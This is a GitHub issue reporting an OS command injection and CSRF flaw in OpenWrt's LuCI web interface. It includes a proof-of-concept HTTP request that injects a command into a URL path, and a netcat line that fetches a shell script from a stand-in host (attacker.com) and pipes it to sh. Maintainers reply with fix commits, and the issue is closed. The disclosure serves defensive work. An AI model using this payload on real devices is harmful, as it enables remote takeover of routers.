openwrt/luci #1719: OS command injection

macintorsten, 2018-04-04:
The path /cgi-bin/luci/admin/status/realtime/bandwidth_status/<INJECTION> is vulnerable to OS Command injection and has no CSRF-protection.

Example POC HTTP Request:

```
GET /cgi-bin/luci/admin/status/realtime/bandwidth_status/`ls` HTTP/1.1
Host: 192.168.56.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sysauth=6a023feb3b93f621bd7318bd12f98267
Connection: close
```

Change `ls` to the command you wish to execute on the OS. So instead of requesting.

1. Attacker side (attacker.com): 
> cat shellscript.sh | nc -l -p 7890

2. se the command string (in URL) `nc attacker.com 6789 | sh`:

It is vulnerable to [Cross-site request forgery](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) since it's a simple GET request with no anti-CSRF token required. This means that, an attacker can target an authenticated admin (who's currently logged in to LuCi) and trick him to visit any other page which in turn requests the vulnerable URL.

Tested on:
> Powered by LuCI Master (git-18.088.49307-90ed423) / OpenWrt SNAPSHOT r6567-db893ec

jow-, 2018-04-04:
https://github.com/openwrt/luci/commit/9db5fa93afdbb4667e523cba0e6bde4e73a01150, https://github.com/openwrt/luci/commit/9e4b8a91384562e3baee724a52b72e30b1aa006d

jow-, 2018-04-05:
45cefe71f6069b088e14dd913eb382816acb945c, c0d9c4f3ce7bda19081d0da01a599bec067338a3

macintorsten, 2018-04-14:
Tested a bit more. Seems fine. Closing.

closed 2018-04-14 by macintorsten